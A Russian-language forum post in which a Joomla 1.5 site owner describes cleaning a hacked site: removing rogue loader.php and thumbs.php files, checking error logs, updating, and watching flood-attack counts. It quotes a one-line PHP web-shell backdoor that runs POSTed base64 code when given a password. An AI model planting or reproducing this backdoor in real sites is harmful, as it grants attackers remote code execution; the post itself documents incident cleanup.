Вот и моё время пришло ))))
Всем привет. Нашёл следующее по теме:
http://help.yandex.ru/webmaster/?id=1116584И кон у себя такой нашёл в файле, которого не должно быть
\libraries\joomla\loader.php - удалил. Всего было два, оставил один.
to argon06: Спаибо, нашёл 4
thumbs.php и удалил с похожим на <?php if(md5($_POST["password"])=="42554769b6d9a25f116f0ca87f66c85a"){eval(base64_decode($_POST["code"]));} ?> кодом.
Ищу дальше. После чистки нужно обновлять. Пока только не совсем понятно, на сайте не нашёл переходного файла с 1.5.12 до последней, попробую 1.5.1_ закинуть.
Далее:
Ктото пытаеться ломать и ломать...
Есть интересный файлик
error_log рекомендую глянуть. Там много интересного связанного с файлом
\libraries\joomla\loader.phpСпустя несколько часов:
Обновил, почистил и SEF404 выдал следующее, спустя минут 30 после перезаливки
Статус Безопасности: May-2011 [Обновить] (2011-05-09 01:00:58)
Насчитано атак 45 0.2 /h
Слишком много запросов (флуд) 45 100.0 % | 000.2 /h
===
Я так понимаю, что это группа людей с серверами.
В инете всё больше и больше инфы про аналогичные случаи.
Но решения пока нету
Есть только меры предосторожности...
Видимо ктото хочет добить Joomla.
Глянем логи.. ничего необычного...
Будем следить и дальше...